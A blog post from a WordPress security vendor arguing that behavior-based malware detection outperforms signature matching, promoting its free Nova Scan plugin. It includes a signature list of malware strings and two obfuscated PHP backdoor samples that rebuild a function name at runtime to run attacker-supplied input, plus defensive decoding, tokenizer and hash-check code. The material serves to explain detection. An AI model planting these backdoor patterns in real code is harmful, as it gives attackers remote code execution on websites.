How I Trained an AI to Catch What Signatures Can’t

In my last two posts I showed you the backdoors hiding on a “protected” site and what WordPress malware actually looks like when you open the file. Today I want to talk about something different, which is how I built a detection engine that does not work the way you think it does.

I’m going to skip the architecture, the model weights, and the feature extraction pipeline. What I will do is explain why the approach every major WordPress scanner uses has a foundational problem, and why that problem forced me to build something different.

The Signature Problem

Every major WordPress security plugin uses some version of pattern matching. They maintain a database of known malicious strings called signatures, and they scan your files looking for matches. A simplified version looks like this:

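<?php
// Traditional signature matching (simplified)
$signatures = [
    'eval(base64_decode(',
    'eval(gzinflate(',
    'eval(str_rot13(',
    'preg_replace("/.*?/e"',
    'assert(base64_decode(',
    'file_put_contents($GLOBALS[',
];

// Hypothetical helper for this example: a real scanner would log or quarantine the file.
function flag_as_malicious(string $file, string $sig): void
{
    echo "FLAGGED {$file} (matched: {$sig})\n";
}

// Assumption for this example: scan the PHP files in the current directory.
$files = glob(__DIR__ . '/*.php') ?: [];

foreach ($files as $file) {
    $content = file_get_contents($file);
    if ($content === false) {
        continue; // unreadable file, skip it
    }
    foreach ($signatures as $sig) {
        // Plain substring search: any byte-level change to the payload defeats it.
        if (strpos($content, $sig) !== false) {
            flag_as_malicious($file, $sig);
        }
    }
}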

This approach works until the moment it stops working. The real problem is the assumption underneath signatures rather than the signatures themselves. Signature matching assumes malware will contain recognizable strings, and modern PHP malware goes out of its way to contain none of them. You won’t find eval() or base64_decode() anywhere in it, and nothing else in the file will look suspicious to a string search either.

What Modern Malware Looks Like to a Signature Scanner

Here is a real-world backdoor pattern I’ve encountered. I’ve sanitized it, but the technique is active in the wild right now:

<?php
// WordPress Media Handler v3.2
class WP_Media_Processor {
    private $handlers = [];

    public function __construct() {
        $this->handlers = array_map(
            'chr',
            [99,114,101,97,116,101,95,102,117,110,99,116,105,111,110]
        );
    }

    public function process($input) {
        $fn = implode('', $this->handlers);
        return $fn('$x', $input)('');
    }
}

Run every signature scanner on the market against this file and you’ll get zero detections. None of the usual red-flag functions appear anywhere in the file. The class name looks legitimate, the comment claims it’s a media handler, and the variable names are boring on purpose.

The tell is in those integers in the array, which are ASCII codes. The sequence 99,114,101,97,116,101,95,102,117,110,99,116,105,111,110 spells create_function, and the process method assembles that function name character by character before calling it with attacker-supplied input. (create_function() was deprecated in PHP 7.2 and removed in PHP 8.0, so this exact variant needs an older runtime, but the same assembly trick works with any callable name.) It’s full remote code execution, completely invisible to signatures, and it’s what’s running on production WordPress sites right now while Wordfence shows green checkmarks.
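To see why the integers give the game away, it helps to decode them without ever calling the result. The following is a minimal sketch, not anything taken from Nova Scan: the helper names decode_char_codes() and spells_sensitive_callable() and the short list of sensitive callables are assumptions made up for illustration.

```php
<?php
// Hypothetical helper: turn a list of ASCII codes into the string they spell.
// The result is only inspected as text; it is never invoked.
function decode_char_codes(array $codes): string
{
    return implode('', array_map('chr', $codes));
}

// Illustrative and deliberately incomplete list of callables worth a second look.
const SENSITIVE_CALLABLES = ['create_function', 'assert', 'system', 'exec', 'passthru', 'shell_exec'];

// Hypothetical check: does this integer list spell one of the names above?
function spells_sensitive_callable(array $codes): bool
{
    return in_array(strtolower(decode_char_codes($codes)), SENSITIVE_CALLABLES, true);
}

$codes = [99,114,101,97,116,101,95,102,117,110,99,116,105,111,110];
echo decode_char_codes($codes), PHP_EOL;      // create_function
var_dump(spells_sensitive_callable($codes));  // bool(true)
```

A check like this only covers one encoding trick, which is exactly the limitation the next section describes.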

Why More Signatures Don’t Fix This

The natural response to seeing something like that is to add more signatures. You could add detection for array_map('chr', ...) calls, for numeric arrays followed by implode, or for classes with suspicious constructor patterns.

But attackers read changelogs too, and the moment a new signature ships the payload mutates.

Obfuscation tools generate millions of variants, so you end up playing whack-a-mole against an opponent who can change shape faster than you can swing.

Here is another variant of the same technique:

<?php
$_ = 'JHg9Ym' . 'FzZTY' . '0X2Rl' . 'Y29kZS' . 'gkX1BPU1RbJ2knXSk7';
$__ = str_split('edcoab_46teleqsy');
$___ = $__[4].$__[10].$__[7].$__[13].$__[4].$__[14];
@$___($_);

Same result, completely different pattern, and no overlapping strings with the first one. A signature that catches variant A doesn’t touch variant B, and the attacker can generate variants C through Z before lunch.
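The gap is easy to reproduce. The sketch below runs the signature list from earlier in this post against condensed excerpts of both variants, held as inert strings and never executed. The matching_signatures() helper and the $classic sample are assumptions added for the demonstration.

```php
<?php
// The signature list from earlier in the post.
$signatures = [
    'eval(base64_decode(',
    'eval(gzinflate(',
    'eval(str_rot13(',
    'preg_replace("/.*?/e"',
    'assert(base64_decode(',
    'file_put_contents($GLOBALS[',
];

// Hypothetical helper: return every signature that occurs in the source text.
function matching_signatures(string $source, array $signatures): array
{
    return array_values(array_filter(
        $signatures,
        function ($sig) use ($source) {
            return strpos($source, $sig) !== false;
        }
    ));
}

// Condensed excerpts of the two variants as plain text (nowdoc, no interpolation).
$variantA = <<<'SRC'
$this->handlers = array_map('chr', [99,114,101,97,116,101,95,102,117,110,99,116,105,111,110]);
$fn = implode('', $this->handlers);
SRC;

$variantB = <<<'SRC'
$_ = 'JHg9Ym' . 'FzZTY' . '0X2Rl' . 'Y29kZS' . 'gkX1BPU1RbJ2knXSk7';
$__ = str_split('edcoab_46teleqsy');
SRC;

// A textbook payload of the kind signatures were written for.
$classic = 'eval(base64_decode($_POST["x"]));';

var_dump(count(matching_signatures($variantA, $signatures))); // int(0)
var_dump(count(matching_signatures($variantB, $signatures))); // int(0)
var_dump(count(matching_signatures($classic, $signatures)));  // int(1)
```

Only the textbook sample matches. Neither variant shares a single substring with the list, so each would need its own new signature.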

This is the fundamental problem: signatures are reactive. You can only detect what you’ve already seen, so every new payload gets a free pass until someone reports it, a researcher analyzes it, and a signature gets written, tested, and shipped to your site. That window is usually measured in weeks, sometimes in months, and on shared hosting with slow plugin update cycles it can stretch out even longer.

A Different Way to See

I spent two years thinking about this problem before I wrote a single line of detection code.

Finding more malicious strings was never going to solve it, because the strings keep changing. The question I landed on was what malicious code actually does when it runs, regardless of how clean it looks sitting in a file on disk.

Legitimate WordPress code does predictable things: it queries databases, renders templates, and processes form inputs through known sanitization functions, following patterns that core has established over twenty years. Malicious code, no matter how cleverly obfuscated, has to eventually do something that legitimate code doesn’t. At some point it has to execute arbitrary input, write to files it shouldn’t touch, reach out to external servers, or reassemble itself from pieces at runtime.
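One of those behaviors, calling a function whose name only exists at runtime, leaves a structural trace that survives renaming and re-encoding. The sketch below uses PHP’s built-in tokenizer to list places where a variable is invoked as a function. It is a coarse static indicator written for illustration, not the engine described in this post, and find_variable_calls() is a hypothetical name.

```php
<?php
// Sketch: report lines where a variable is called like a function, e.g. $fn(...).
function find_variable_calls(string $source): array
{
    // Drop whitespace and comments so "next token" means "next meaningful token".
    $tokens = array_values(array_filter(
        token_get_all($source),
        function ($t) {
            return !is_array($t)
                || !in_array($t[0], [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT], true);
        }
    ));

    $hits = [];
    foreach ($tokens as $i => $token) {
        $next = $tokens[$i + 1] ?? null;
        // A T_VARIABLE immediately followed by "(" is a dynamic call.
        if (is_array($token) && $token[0] === T_VARIABLE && $next === '(') {
            $hits[] = ['line' => $token[2], 'variable' => $token[1]];
        }
    }
    return $hits;
}

// Harmless sample held as text; it is tokenized, never executed.
$sample = <<<'SRC'
<?php
$title = strtoupper($_GET['t']);
$fn = implode('', $parts);
echo $fn($input);
SRC;

print_r(find_variable_calls($sample)); // one hit: line 4, variable $fn
```

Plenty of legitimate code calls variables too (callbacks, hooks, factories), so a hit here is a reason to look closer rather than a verdict. Calls through array elements or object properties are not covered by this sketch.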

Signature matching asks whether a string matches a known bad string. The engine I built asks a different question, and I can’t spell that question out here. The reason for the silence is practical: the moment I publish the detection methodology, every obfuscation toolkit in the PHP underworld adds a bypass for it within a week.

What I can tell you is that the engine doesn’t look for strings or maintain a list of bad patterns. It evaluates code the way a senior security researcher would, by understanding what the code does rather than what it says.

The Training Problem

Building this kind of detection requires training data, a lot of it. I needed a massive corpus of known-malicious PHP and an equally massive corpus of known-clean PHP, so the model could learn what legitimate WordPress code looks like in enough detail that anything anomalous would be obvious by contrast.

The clean corpus was straightforward to assemble: every version of WordPress core, every plugin in the wordpress.org repository, and every theme in the directory. Millions of files, all verified clean by the repository’s own review process.

The malicious corpus was harder. I sourced from every public malware database I could find, collected samples from client cleanups spanning years, crawled honeypots, and reverse-engineered obfuscation tools to generate synthetic variants of real attacks.

Training Corpus (approximate)
─────────────────────────────
Verified clean:                  12.4M files
Malicious:                       341,000+ samples
Hash database:                   950,000+ verified entries
Obfuscation variants generated:  ~2.1M

Then I built four dedicated detection engines, each specialized for a different threat surface. I’m not going to tell you what those four surfaces are. If you’ve read the Nova Scan documentation you already know, and if you haven’t, that’s by design.

What Happens in Practice

This is what signature matching sees when it scans a compromised site:

[Wordfence] Scan complete: 0 issues found ✓
[Sucuri] Site is clean ✓
[MalCare] No malware detected ✓

And this is what my engine sees on the same site:

[NDE] 3 threats detected
  ├── wp-content/db.php
  │   Confidence: 97.2%
  │   Classification: Remote Code Execution (stream wrapper)
  │   Technique: zip:// protocol handler loading encrypted payload
  │
  ├── wp-content/uploads/2024/03/.cache.php
  │   Confidence: 94.8%
  │   Classification: Persistent Backdoor (cron-based)
  │   Technique: wp_cron callback executing reconstructed function
  │
  └── wp-includes/class-wp-locale.php (MODIFIED)
      Confidence: 99.1%
      Hash mismatch: 12 lines injected at L847-858
      Classification: Cookie-activated RCE
      Technique: $_COOKIE value passed through variable function call

The difference between those two outputs is not a bigger signature database. The engine behind the second scan doesn’t maintain a signature database at all. The detections came from evaluating what each file actually does when it runs.
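The “Hash mismatch” line in the third finding is the easiest part to illustrate. Here is a minimal sketch of integrity checking against a manifest of known-good hashes. The manifest format (relative path mapped to a SHA-256 hex digest) and the find_modified_files() helper are assumptions for this example, not Nova Scan’s actual format.

```php
<?php
// Sketch: compare files on disk with a manifest of known-good SHA-256 hashes.
// Assumed manifest shape: ['relative/path.php' => 'hex digest', ...]
function find_modified_files(string $root, array $manifest): array
{
    $modified = [];
    foreach ($manifest as $relativePath => $expectedHash) {
        $path = rtrim($root, '/') . '/' . $relativePath;
        if (!is_file($path)) {
            $modified[$relativePath] = 'missing';
            continue;
        }
        // hash_equals() does a strict string comparison of the two digests.
        if (!hash_equals($expectedHash, hash_file('sha256', $path))) {
            $modified[$relativePath] = 'hash mismatch';
        }
    }
    return $modified;
}

// Demo in a throwaway directory: record a hash, then append a line to the file.
$root = sys_get_temp_dir() . '/hashdemo_' . uniqid();
mkdir($root);
file_put_contents($root . '/a.php', "<?php echo 'ok';\n");
$manifest = ['a.php' => hash_file('sha256', $root . '/a.php')];

print_r(find_modified_files($root, $manifest)); // empty: nothing has changed yet
file_put_contents($root . '/a.php', "// injected line\n", FILE_APPEND);
print_r(find_modified_files($root, $manifest)); // a.php => hash mismatch
```

A hash check says that a core file changed, not what the change does, which is why the finding above pairs it with a classification. For WordPress core specifically, WP-CLI’s `wp core verify-checksums` performs a comparable check against official checksums.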

The False Positive Problem

High detection rates are easy if you don’t care about false positives. Flag everything with eval() and you’ll catch most malware, but you’ll also catch a hundred legitimate plugins that use eval() for perfectly valid reasons. Several caching plugins use it, some template engines rely on it, and WordPress core itself uses it in specific contexts.

A 99% detection rate with a 5% false positive rate sounds impressive until you do the math on a site with 10,000 files.

That’s roughly 500 clean files incorrectly flagged as malicious, and nobody is going to manually review 500 files. They’ll either ignore all the warnings or nuke their entire installation and start over. For detection to be useful at all, the false positive rate has to be near zero rather than merely low.
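The arithmetic is worth spelling out, because the base rate is what makes it so lopsided. The sketch below assumes, purely for illustration, that 3 of the 10,000 files are actually malicious. The expected_scan_outcome() helper is hypothetical.

```php
<?php
// Expected scan outcome for a site, given a detector's rates.
function expected_scan_outcome(
    int $cleanFiles,
    int $maliciousFiles,
    float $detectionRate,
    float $falsePositiveRate
): array {
    $truePositives  = $maliciousFiles * $detectionRate;
    $falsePositives = $cleanFiles * $falsePositiveRate;
    $flagged        = $truePositives + $falsePositives;

    return [
        'true_positives'  => $truePositives,
        'false_positives' => $falsePositives,
        // Share of flagged files that are actually malicious.
        'precision'       => $flagged > 0 ? $truePositives / $flagged : 0.0,
    ];
}

// Assumption for illustration: 9,997 clean files and 3 malicious ones.
$outcome = expected_scan_outcome(9997, 3, 0.99, 0.05);

printf(
    "expected false alarms: %.0f, expected real hits: %.2f, precision: %.2f%%\n",
    $outcome['false_positives'],
    $outcome['true_positives'],
    $outcome['precision'] * 100
);
```

Under those assumptions the scan raises about 500 false alarms for about 3 real detections, so well under 1% of the flagged files are actually malicious.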

The training corpus matters most at this boundary. The engine has to understand that eval() in a caching plugin’s template renderer is normal, while eval() receiving data from $_POST through three layers of string manipulation is not. The function call is identical, yet the engine has to reach completely different verdicts depending on where the input comes from.

I tested the engine against every default plugin bundle shipped by every major hosting provider, including Hostinger, SiteGround, Bluehost, GoDaddy, and Cloudways. A fresh WordPress install on Hostinger comes with about a dozen pre-installed plugins, and my engine had to look at every file in every one of those plugins and correctly identify them all as clean. That validation alone took months, and every time I adjusted the model to catch a new malware variant, I had to re-validate against the entire clean corpus to make sure I hadn’t introduced new false positives.

What I Can’t Tell You

I’m deliberately vague about the technical implementation, and the reason is practical. The moment the feature extraction pipeline gets published, attackers start optimizing their obfuscation specifically to evade it. Describing the classification boundaries leads to payloads crafted to sit just below the threshold, and releasing the model architecture invites adversarial networks trained specifically to bypass it.

Security through obscurity alone is weak, but obscurity as one layer in a defense-in-depth strategy is smart.

The engine’s effectiveness is tested publicly, because anyone can install Nova Scan and throw real malware at it, and the detection and false-positive rates are both verifiable by anyone who wants to run the tests. What’s not public is how the engine achieves those rates. The comparison I have in mind is cryptography, where algorithms are published but private keys aren’t, though the analogy is loose, since here it is the results rather than the mechanism that are open to inspection. The outcomes can be evaluated by anyone, while the specific implementation details that would let an attacker craft a bypass stay private.

What Comes Next

Nova Scan is free, and not in the freemium sense where the useful features are locked behind a paywall. The full detection engine, all four NDE models, the two-mode firewall, brute-force protection, and community threat intelligence all ship in the free version, across unlimited sites, with no credit card asked for at any point.

I built it because I was tired of cleaning up after scanners that should have caught the threat months earlier. Every site I cleaned was running a security plugin, and every one of those plugins had missed the compromise for weeks before anyone noticed. If you’ve read this far, you’re probably the kind of person who has cleaned a few hacked sites yourself, and you know what that moment feels like when it hits you that the tool you trusted was looking for the wrong things entirely.

That’s why I built something that evaluates what code does instead of scanning for what it contains. The patterns keep changing, but the behavior is what actually has to happen for the malware to do anything, and that is what Nova Scan watches for.

~ SephX, Nova Heaven. Still cleaning up malware, still not charging you for the privilege of knowing about it.